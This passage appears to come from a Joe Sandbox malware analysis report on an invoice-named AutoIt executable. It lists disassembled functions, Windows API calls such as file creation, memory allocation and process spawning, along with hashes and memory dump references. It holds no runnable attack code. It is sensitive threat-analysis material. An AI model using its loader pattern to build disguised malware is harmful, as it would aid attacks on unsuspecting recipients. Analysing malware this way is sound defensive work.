                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 975902462-1005189915
                                                                            • Opcode ID: b13e2c32276727bfc8df1c167add6f1a7a4a116b1dbb7092aa481fdf5849e569
                                                                            • Instruction ID: 874631ccd3d3a92ae96bba3e954f42b074b2613a4e182c41dfba61e5eb628cb3
                                                                            • Opcode Fuzzy Hash: b13e2c32276727bfc8df1c167add6f1a7a4a116b1dbb7092aa481fdf5849e569
                                                                            • Instruction Fuzzy Hash: 35314771841309AFDB01CFA4EC89ADEBBF0FB09711F1445AEE680E62A0D3B50589DF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3074
                                                                            • RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                            • LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 975902462-1005189915
                                                                            • Opcode ID: 052662d08b965b4f86ca901b5a2d2f552f20eb04a5b1af9b9079abd6279851dc
                                                                            • Instruction ID: cb0ecf1d0d29063ce2f8bec0bce4c6a246780af13dce9d46727e3f7680956971
                                                                            • Opcode Fuzzy Hash: 052662d08b965b4f86ca901b5a2d2f552f20eb04a5b1af9b9079abd6279851dc
                                                                            • Instruction Fuzzy Hash: 0621B4B191171CAFDB01DFA4E849ADDBBF4FB08B11F04416AFA11A62A0D7B14548AF91

                                                                            Control-flow Graph

                                                                            control_flow_graph 1015 116d748-116d79a call 116d648 CreateFileW 1018 116d7a3-116d7b0 1015->1018 1019 116d79c-116d79e 1015->1019 1022 116d7b2-116d7be 1018->1022 1023 116d7c3-116d7da VirtualAlloc 1018->1023 1020 116d8fc-116d900 1019->1020 1022->1020 1024 116d7e3-116d809 CreateFileW 1023->1024 1025 116d7dc-116d7de 1023->1025 1026 116d82d-116d847 ReadFile 1024->1026 1027 116d80b-116d828 1024->1027 1025->1020 1029 116d86b-116d86f 1026->1029 1030 116d849-116d866 1026->1030 1027->1020 1032 116d890-116d8a7 WriteFile 1029->1032 1033 116d871-116d88e 1029->1033 1030->1020 1034 116d8d2-116d8f7 CloseHandle VirtualFree 1032->1034 1035 116d8a9-116d8d0 1032->1035 1033->1020 1034->1020 1035->1020
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0116D78D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction ID: 6cd30e94193fc6a9009949e643e139d3841c67e9653ea4f52f143a6e87402fee
                                                                            • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction Fuzzy Hash: 86511675A50208FBEF24DFE4DC89FDE7778AF48700F108554F64AEA180DB7596448B60

                                                                            Control-flow Graph

                                                                            control_flow_graph 1055 ed39d5-ed3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00ED3A03
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00ED3A24
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00ED3A38
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00ED3A41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 3778d1151b6a14f16cce2d10f32c6eac27acfe5f1d4850530d04f9ead6a93d7d
                                                                            • Instruction ID: f10f2b8264f7680ee7bd35e6f5cdc1ce4a258b8d25fde9532590f9552b4e6554
                                                                            • Opcode Fuzzy Hash: 3778d1151b6a14f16cce2d10f32c6eac27acfe5f1d4850530d04f9ead6a93d7d
                                                                            • Instruction Fuzzy Hash: 5CF03A705006987EEB3257636C08E2B3E7DD7CBF51B00006ABA00A21B0C2611805EBB0

                                                                            Control-flow Graph

                                                                            control_flow_graph 1056 ed686a-ed6891 call ed4ddd 1059 f0e031-f0e041 call f3955b 1056->1059 1060 ed6897-ed68a5 call ed4ddd 1056->1060 1064 f0e046-f0e048 1059->1064 1060->1059 1065 ed68ab-ed68b1 1060->1065 1066 f0e067-f0e0af call ef0db6 1064->1066 1067 f0e04a-f0e04d call ed4e4a 1064->1067 1069 f0e052-f0e061 call f342f8 1065->1069 1070 ed68b7-ed68d9 call ed6a8c 1065->1070 1075 f0e0b1-f0e0bb 1066->1075 1076 f0e0d4 1066->1076 1067->1069 1069->1066 1079 f0e0cf-f0e0d0 1075->1079 1080 f0e0d6-f0e0e9 1076->1080 1081 f0e0d2 1079->1081 1082 f0e0bd-f0e0cc 1079->1082 1083 f0e260-f0e263 call ef2d55 1080->1083 1084 f0e0ef 1080->1084 1081->1080 1082->1079 1087 f0e268-f0e271 call ed4e4a 1083->1087 1086 f0e0f6-f0e0f9 call ed7480 1084->1086 1090 f0e0fe-f0e120 call ed5db2 call f373e9 1086->1090 1093 f0e273-f0e283 call ed7616 call ed5d9b 1087->1093 1099 f0e122-f0e12f 1090->1099 1100 f0e134-f0e13e call f373d3 1090->1100 1107 f0e288-f0e2b8 call f2f7a1 call ef0e2c call ef2d55 call ed4e4a 1093->1107 1102 f0e227-f0e237 call ed750f 1099->1102 1109 f0e140-f0e153 1100->1109 1110 f0e158-f0e162 call f373bd 1100->1110 1102->1090 1112 f0e23d-f0e247 call ed735d 1102->1112 1107->1093 1109->1102 1119 f0e164-f0e171 1110->1119 1120 f0e176-f0e180 call ed5e2a 1110->1120 1118 f0e24c-f0e25a 1112->1118 1118->1083 1118->1086 1119->1102 1120->1102 1126 f0e186-f0e19e call f2f73d 1120->1126 1131 f0e1a0-f0e1bf call ed7de1 call ed5904 1126->1131 1132 f0e1c1-f0e1c4 1126->1132 1155 f0e1e2-f0e1f0 call ed5db2 1131->1155 1134 f0e1f2-f0e1f5 1132->1134 1135 f0e1c6-f0e1e1 call ed7de1 call ed6839 call ed5904 1132->1135 1137 f0e215-f0e218 call f3737f 1134->1137 1138 f0e1f7-f0e200 call f2f65e 1134->1138 1135->1155 1145 f0e21d-f0e226 call ef0e2c 1137->1145 1138->1107 1148 f0e206-f0e210 call ef0e2c 1138->1148 1145->1102 1148->1090 1155->1145
                                                                            APIs
                                                                              • Part of subcall function 00ED4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E0F
                                                                            • _free.LIBCMT ref: 00F0E263
                                                                            • _free.LIBCMT ref: 00F0E2AA
                                                                              • Part of subcall function 00ED6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00ED6BAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: /v$>>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                            • API String ID: 2861923089-2462514854
                                                                            • Opcode ID: 5c061cd8b8bf2bb2b334186f69ccf772829e2ea893e0671308c0b34edd644011
                                                                            • Instruction ID: 346dcb266c6940fac749946203bbe38ce550e5e67ea67b23abd0188fd65d7fc4
                                                                            • Opcode Fuzzy Hash: 5c061cd8b8bf2bb2b334186f69ccf772829e2ea893e0671308c0b34edd644011
                                                                            • Instruction Fuzzy Hash: C8916D71D04219AFCF14EFA4CC819EDB7B8FF14310B10486AF815BB2A1DB74A906EB50

                                                                            Control-flow Graph

                                                                            control_flow_graph 1160 ed407c-ed4092 1161 ed416f-ed4173 1160->1161 1162 ed4098-ed40ad call ed7a16 1160->1162 1165 f0d3c8-f0d3d7 LoadStringW 1162->1165 1166 ed40b3-ed40d3 call ed7bcc 1162->1166 1169 f0d3e2-f0d3fa call ed7b2e call ed6fe3 1165->1169 1166->1169 1170 ed40d9-ed40dd 1166->1170 1179 ed40ed-ed416a call ef2de0 call ed454e call ef2dbc Shell_NotifyIconW call ed5904 1169->1179 1182 f0d400-f0d41e call ed7cab call ed6fe3 call ed7cab 1169->1182 1172 ed4174-ed417d call ed8047 1170->1172 1173 ed40e3-ed40e8 call ed7b2e 1170->1173 1172->1179 1173->1179 1179->1161 1182->1179
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F0D3D7
  • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
• _memset.LIBCMT ref: 00ED40FC
• _wcscpy.LIBCMT ref: 00ED4150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ED4160
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: 1b238928703d20355998744d27262afd9fabc47d0c69dbf14ff7c1872a129a0c
• Instruction ID: 295e46c5b24e8872f64a8d7c3de87ef351d8de2cb2dc10386ed3bdedc519277b
• Opcode Fuzzy Hash: 1b238928703d20355998744d27262afd9fabc47d0c69dbf14ff7c1872a129a0c
• Instruction Fuzzy Hash: A631ED71008708AFD321EB60DC46BEB77D8EB54300F10151FF284A22E2EB70A64ADB83
APIs
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction ID: bc777cb815d198b260199374b3e51be1e91865961acf5988622adb87a6702322
• Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction Fuzzy Hash: E451D972A00B0DDBCB248FA9DC406BE77A2AF61325F249729FB35B62D0D7709D509B40
APIs
  • Part of subcall function 0116F0F8: Sleep.KERNELBASE(000001F4), ref: 0116F109
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116F374
Strings
Memory Dump Source
• Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: S985LKZW0SDYU1L0HS2
• API String ID: 2694422964-1167979699
• Opcode ID: 062ace9728767f7a8471793a238ba19ea6f292abe6d7852fcce0d7332d296ff6
• Instruction ID: 387fe1691568f86cae1b8cbeaf0e6ea7931cbb5c434feca1d5b7a531716ec934
• Opcode Fuzzy Hash: 062ace9728767f7a8471793a238ba19ea6f292abe6d7852fcce0d7332d296ff6
• Instruction Fuzzy Hash: 90618331D04249DBEF15DBA4D8547EEBB79EF19304F004199E608BB2C0D7BA1B46CBA6
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00ED35A1,SwapMouseButtons,00000004,?), ref: 00ED35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00ED35A1,SwapMouseButtons,00000004,?,?,?,?,00ED2754), ref: 00ED35F5
• RegCloseKey.KERNELBASE(00000000,?,?,00ED35A1,SwapMouseButtons,00000004,?,?,?,?,00ED2754), ref: 00ED3617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: d0cc4b8f7c03efaf093b15a4f048d2eda5bbd1a2aa6d8434e75010384cef9c07
• Instruction ID: 544e81d99fe056564ea4e4d4c0f456ec8bdffaf20db245db9c580cb7ec479b4e
• Opcode Fuzzy Hash: d0cc4b8f7c03efaf093b15a4f048d2eda5bbd1a2aa6d8434e75010384cef9c07
• Instruction Fuzzy Hash: 28113675910208BADB20CF64DC40EAABBA8EF04744F0054AAA905E7250D2719E46A761
APIs
  • Part of subcall function 00ED4EE5: _fseek.LIBCMT ref: 00ED4EFD
  • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39824
  • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39837
• _free.LIBCMT ref: 00F396A2
• _free.LIBCMT ref: 00F396A9
• _free.LIBCMT ref: 00F39714
  • Part of subcall function 00EF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9A24), ref: 00EF2D69
  • Part of subcall function 00EF2D55: GetLastError.KERNEL32(00000000,?,00EF9A24), ref: 00EF2D7B
• _free.LIBCMT ref: 00F3971C
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
• Instruction ID: 84514a6350e170be3073c7e2b470f046256e9fac3bd5fb3e6f6c9d47dcc61d47
• Opcode Fuzzy Hash: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
• Instruction Fuzzy Hash: CB514EB1D04218ABDF259F64CC81AAEBBB9EF48310F10049EF609A7391DB715A81CF58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
• Instruction ID: a399547b3d98ef312eb3382aaa059331d2b4bc6b20e906d6f20c44f945e9e450
• Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
• Instruction Fuzzy Hash: 2A41C5B5B0078D9BDB1C9E69C8809BB7BA5EF413A4B14917EF619A76C0D770DD408B40
APIs
• _memset.LIBCMT ref: 00F0EA39
• 7574D0D0.COMDLG32(?), ref: 00F0EA83
  • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
  • Part of subcall function 00EF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF07B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: NamePath$7574FullLong_memset
• String ID: X
• API String ID: 3399031285-3081909835
• Opcode ID: 4ef4b5105806c74500136919f1e071373a8fa131d3acfbc0a579c541c0990b47
• Instruction ID: 6f1d31f1e65934a142adefd935e3411bc5b1dd4ac2cd91d22be16e67cb3141bb
• Opcode Fuzzy Hash: 4ef4b5105806c74500136919f1e071373a8fa131d3acfbc0a579c541c0990b47
• Instruction Fuzzy Hash: 2221C670A002489BCB119F94CC45BEE7BF9AF48710F00405AE548B7382DBB4594A9F91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: e935a250548ede965de484b58d1bc1c6037aa25bfe5202cecbf576dfa681bdd1
• Instruction ID: f694df873f1759e8c5e4e7fc3450f3e5ee720d4274b4aae713d622b10da5cc8b
• Opcode Fuzzy Hash: e935a250548ede965de484b58d1bc1c6037aa25bfe5202cecbf576dfa681bdd1
• Instruction Fuzzy Hash: 0A01B972D042187EDF18DAA8CC56EFE7BF8DB15311F00459AF652D2181E979E6049760
APIs
  • Part of subcall function 00EF571C: __FF_MSGBANNER.LIBCMT ref: 00EF5733
  • Part of subcall function 00EF571C: __NMSG_WRITE.LIBCMT ref: 00EF573A
  • Part of subcall function 00EF571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
• std::exception::exception.LIBCMT ref: 00EF0DEC
• __CxxThrowException@8.LIBCMT ref: 00EF0E01
  • Part of subcall function 00EF859B: RaiseException.KERNEL32(?,?,00000000,00F89E78,?,00000001,?,?,?,00EF0E06,00000000,00F89E78,00ED9E8C,00000001), ref: 00EF85F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID: bad allocation
• API String ID: 3902256705-2104205924
• Opcode ID: bfb30d3e997968608959ffe7a41bae3f3534fe9c1c864abe7070b58b8d7bc8da
• Instruction ID: 1f362db2de49e407b6377c3a6fc20dcba0bad41077e07e9114d53c8404cd8c63
• Opcode Fuzzy Hash: bfb30d3e997968608959ffe7a41bae3f3534fe9c1c864abe7070b58b8d7bc8da
• Instruction Fuzzy Hash: 9AF0A43190021E67CB10BAA4ED019FE7BEC9F01355F105426FB14B6183EFB19A40D6D1
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0116DE6D
• ExitProcess.KERNEL32(00000000), ref: 0116DE8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
• Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
• Instruction ID: 5c1ed28ee8b075171433cc79ead012ad03e0cd09a161799a73c3e2ec7b23a4ba
• Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
• Instruction Fuzzy Hash: 15F0ECB154425DABDB64EFE0CC49FEE777CBF04705F408508BA4A9A180DB7996188B61
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00F398F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F3990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
